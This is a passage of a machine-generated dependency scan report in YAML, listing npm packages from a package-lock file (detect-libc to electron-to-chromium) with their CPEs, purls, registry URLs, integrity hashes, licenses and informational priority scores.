- cpe: cpe:2.3:a:detect-libc:detect-libc:2.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:detect-libc:detect_libc:2.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:detect_libc:detect-libc:2.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:detect_libc:detect_libc:2.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:detect:detect-libc:2.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:detect:detect_libc:2.1.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/detect-libc@2.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/detect-libc/-/detect-libc-2.1.2.tgz
integrity: sha512-Btj2BOOO83o3WyH59e8MgXsxEQVcarkUOpEYrubB0urwnN10yQ364rsiByU11nZlqWYZm05i/of7io4mzihBtQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d9872bdf37f54c1c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: dfa 1.2.0'
title: dfa 1.2.0
description: 'Package discovered: dfa 1.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 32140b01170f2db8
name: dfa
version: 1.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:dfa:dfa:1.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/dfa@1.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/dfa/-/dfa-1.2.0.tgz
integrity: sha512-ED3jP8saaweFTjeGX8HQPjeC1YYyZs98jGNZx6IiBvxW7JG5v492kamAQB3m2wop07CvU/RQmzcKr6bgcC5D/Q==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9f98c7e106363761
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: didyoumean 1.2.2'
title: didyoumean 1.2.2
description: 'Package discovered: didyoumean 1.2.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 88295af7ba0997fd
name: didyoumean
version: 1.2.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:didyoumean:didyoumean:1.2.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/didyoumean@1.2.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/didyoumean/-/didyoumean-1.2.2.tgz
integrity: sha512-gxtyfqMg7GKyhQmb056K7M3xszy/myH8w+B4RT+QXBQsvAOdc3XymqDDPHx1BgPgsdAA5SIifona89YtRATDzw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 1b1c014679b0d671
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: dijkstrajs 1.0.3'
title: dijkstrajs 1.0.3
description: 'Package discovered: dijkstrajs 1.0.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 7a3b023286e84986
name: dijkstrajs
version: 1.0.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:dijkstrajs:dijkstrajs:1.0.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/dijkstrajs@1.0.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/dijkstrajs/-/dijkstrajs-1.0.3.tgz
integrity: sha512-qiSlmBq9+BCdCA/L46dw8Uy93mloxsPSbwnm5yrKn2vMPiy8KyAskTF6zuV/j5BMsmOGZDPs7KjU+mjb670kfA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4fdc8b3106066f47
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: dlv 1.1.3'
title: dlv 1.1.3
description: 'Package discovered: dlv 1.1.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 6145214b9f2f7148
name: dlv
version: 1.1.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:dlv:dlv:1.1.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/dlv@1.1.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/dlv/-/dlv-1.1.3.tgz
integrity: sha512-+HlytyjlPKnIG8XuRG8WvmBP8xs8P71y+SKKS6ZXWoEgLuePxtDoUEiH7WkdePWrQ5JBpE6aoVqfZfJUQkjXwA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4d01289dd001e612
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: dom-helpers 5.2.1'
title: dom-helpers 5.2.1
description: 'Package discovered: dom-helpers 5.2.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 22b93db9f5eba040
name: dom-helpers
version: 5.2.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:dom-helpers:dom-helpers:5.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:dom-helpers:dom_helpers:5.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:dom_helpers:dom-helpers:5.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:dom_helpers:dom_helpers:5.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:dom:dom-helpers:5.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:dom:dom_helpers:5.2.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/dom-helpers@5.2.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/dom-helpers/-/dom-helpers-5.2.1.tgz
integrity: sha512-nRCa7CK3VTrM2NmGkIy4cbK7IZlgBE/PYMn55rrXefr5xXDP0LdtfPnblFDoVdcAfslJ7or6iqAUnx0CCGIWQA==
dependencies:
'@babel/runtime': ^7.8.7
csstype: ^3.0.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 594471832719edc2
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: dom-serializer 2.0.0'
title: dom-serializer 2.0.0
description: 'Package discovered: dom-serializer 2.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f8e1d8922cf56c54
name: dom-serializer
version: 2.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:dom-serializer:dom-serializer:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:dom-serializer:dom_serializer:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:dom_serializer:dom-serializer:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:dom_serializer:dom_serializer:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:dom:dom-serializer:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:dom:dom_serializer:2.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/dom-serializer@2.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/dom-serializer/-/dom-serializer-2.0.0.tgz
integrity: sha512-wIkAryiqt/nV5EQKqQpo3SToSOV9J0DnbJqwK7Wv/Trc92zIAYZ4FlMu+JPFW1DfGFt81ZTCGgDEabffXeLyJg==
dependencies:
domelementtype: ^2.3.0
domhandler: ^5.0.2
entities: ^4.2.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 04fd13748534548d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: domelementtype 2.3.0'
title: domelementtype 2.3.0
description: 'Package discovered: domelementtype 2.3.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 5df6e95fb09fce0c
name: domelementtype
version: 2.3.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-2-Clause
spdxExpression: BSD-2-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:domelementtype:domelementtype:2.3.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/domelementtype@2.3.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/domelementtype/-/domelementtype-2.3.0.tgz
integrity: sha512-OLETBj6w0OsagBwdXnPdN0cnMfF9opN69co+7ZrbfPGrdpPVNBUj02spi6B1N7wChLQiPn4CSH/zJvXw56gmHw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 21e3025ed99f3f28
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: domhandler 5.0.3'
title: domhandler 5.0.3
description: 'Package discovered: domhandler 5.0.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 952037d890bc80f6
name: domhandler
version: 5.0.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-2-Clause
spdxExpression: BSD-2-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:domhandler:domhandler:5.0.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/domhandler@5.0.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/domhandler/-/domhandler-5.0.3.tgz
integrity: sha512-cgwlv/1iFQiFnU96XXgROh8xTeetsnJiDsTc7TYCLFd9+/WNkIqPTxiM/8pSd8VIrhXGTf1Ny1q1hquVqDJB5w==
dependencies:
domelementtype: ^2.3.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d6dff11bd10e354b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: domutils 3.2.2'
title: domutils 3.2.2
description: 'Package discovered: domutils 3.2.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 1b9db533b6297450
name: domutils
version: 3.2.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-2-Clause
spdxExpression: BSD-2-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:domutils:domutils:3.2.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/domutils@3.2.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/domutils/-/domutils-3.2.2.tgz
integrity: sha512-6kZKyUajlDuqlHKVX1w7gyslj9MPIXzIFiz/rGu35uC1wMi+kMhQwGhl4lt9unC9Vb9INnY9Z3/ZA3+FhASLaw==
dependencies:
dom-serializer: ^2.0.0
domelementtype: ^2.3.0
domhandler: ^5.0.3
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4726026d0ba78a1e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: dunder-proto 1.0.1'
title: dunder-proto 1.0.1
description: 'Package discovered: dunder-proto 1.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 23d9641db70f3051
name: dunder-proto
version: 1.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:dunder-proto:dunder-proto:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:dunder-proto:dunder_proto:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:dunder_proto:dunder-proto:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:dunder_proto:dunder_proto:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:dunder:dunder-proto:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:dunder:dunder_proto:1.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/dunder-proto@1.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz
integrity: sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==
dependencies:
call-bind-apply-helpers: ^1.0.1
es-errors: ^1.3.0
gopd: ^1.2.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: eae177c358a69822
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: duplexify 4.1.3'
title: duplexify 4.1.3
description: 'Package discovered: duplexify 4.1.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 91c59a4a431b283f
name: duplexify
version: 4.1.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:duplexify:duplexify:4.1.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/duplexify@4.1.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/duplexify/-/duplexify-4.1.3.tgz
integrity: sha512-M3BmBhwJRZsSx38lZyhE53Csddgzl5R7xGJNk7CVddZD6CcmwMCH8J+7AprIrQKH7TonKxaCjcv27Qmf+sQ+oA==
dependencies:
end-of-stream: ^1.4.1
inherits: ^2.0.3
readable-stream: ^3.1.1
stream-shift: ^1.0.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d3b8cfaa5ee0e8d1
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: eastasianwidth 0.2.0'
title: eastasianwidth 0.2.0
description: 'Package discovered: eastasianwidth 0.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e7e9dd6a07994e54
name: eastasianwidth
version: 0.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:eastasianwidth:eastasianwidth:0.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/eastasianwidth@0.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz
integrity: sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: cb63ab5ab6733afe
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: ecdsa-sig-formatter 1.0.11'
title: ecdsa-sig-formatter 1.0.11
description: 'Package discovered: ecdsa-sig-formatter 1.0.11'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 4ed0ded14e893339
name: ecdsa-sig-formatter
version: 1.0.11
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:ecdsa-sig-formatter:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ecdsa-sig-formatter:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ecdsa_sig_formatter:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ecdsa_sig_formatter:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ecdsa-sig:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ecdsa-sig:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ecdsa_sig:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ecdsa_sig:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ecdsa:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ecdsa:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/ecdsa-sig-formatter@1.0.11
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/ecdsa-sig-formatter/-/ecdsa-sig-formatter-1.0.11.tgz
integrity: sha512-nagl3RYrbNv6kQkeJIpt6NJZy8twLB/2vtz6yN9Z4vRKHN4/QZJIEbqohALSgwKdnksuY3k5Addp5lg8sVoVcQ==
dependencies:
safe-buffer: ^5.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 3d3ef9aed82705e2
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: editorconfig 1.0.7'
title: editorconfig 1.0.7
description: 'Package discovered: editorconfig 1.0.7'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 122ede063714b5b3
name: editorconfig
version: 1.0.7
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:editorconfig:editorconfig:1.0.7:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/editorconfig@1.0.7
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/editorconfig/-/editorconfig-1.0.7.tgz
integrity: sha512-e0GOtq/aTQhVdNyDU9e02+wz9oDDM+SIOQxWME2QRjzRX5yyLAuHDE+0aE8vHb9XRC8XD37eO2u57+F09JqFhw==
dependencies:
'@one-ini/wasm': 0.1.1
commander: ^10.0.0
minimatch: ^9.0.1
semver: ^7.5.3
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9669afa378e5a35f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: ee-first 1.1.1'
title: ee-first 1.1.1
description: 'Package discovered: ee-first 1.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e40c9e2062507e8a
name: ee-first
version: 1.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:ee-first:ee-first:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ee-first:ee_first:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ee_first:ee-first:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ee_first:ee_first:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ee:ee-first:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ee:ee_first:1.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/ee-first@1.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/ee-first/-/ee-first-1.1.1.tgz
integrity: sha512-WMwm9LhRUo+WUaRN+vRuETqG89IgZphVSNkdFgeb6sS/E4OrDIN7t48CAewSHXc6C8lefD8KKfr5vY61brQlow==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 04d3ce47ab6baf5d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: electron-to-chromium 1.5.345'
title: electron-to-chromium 1.5.345
description: 'Package discovered: electron-to-chromium 1.5.345'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: dc02d9fca5801675
name: electron-to-chromium
version: 1.5.345
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:electron-to-chromium:electron-to-chromium:1.5.345:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:electron-to-chromium:electron_to_chromium:1.5.345:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:electron_to_chromium:electron-to-chromium:1.5.345:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:electron_to_chromium:electron_to_chromium:1.5.345:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:electron-to:electron-to-chromium:1.5.345:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:electron-to:electron_to_chromium:1.5.345:*:*:*:*:*:*:*
source: syft-generated
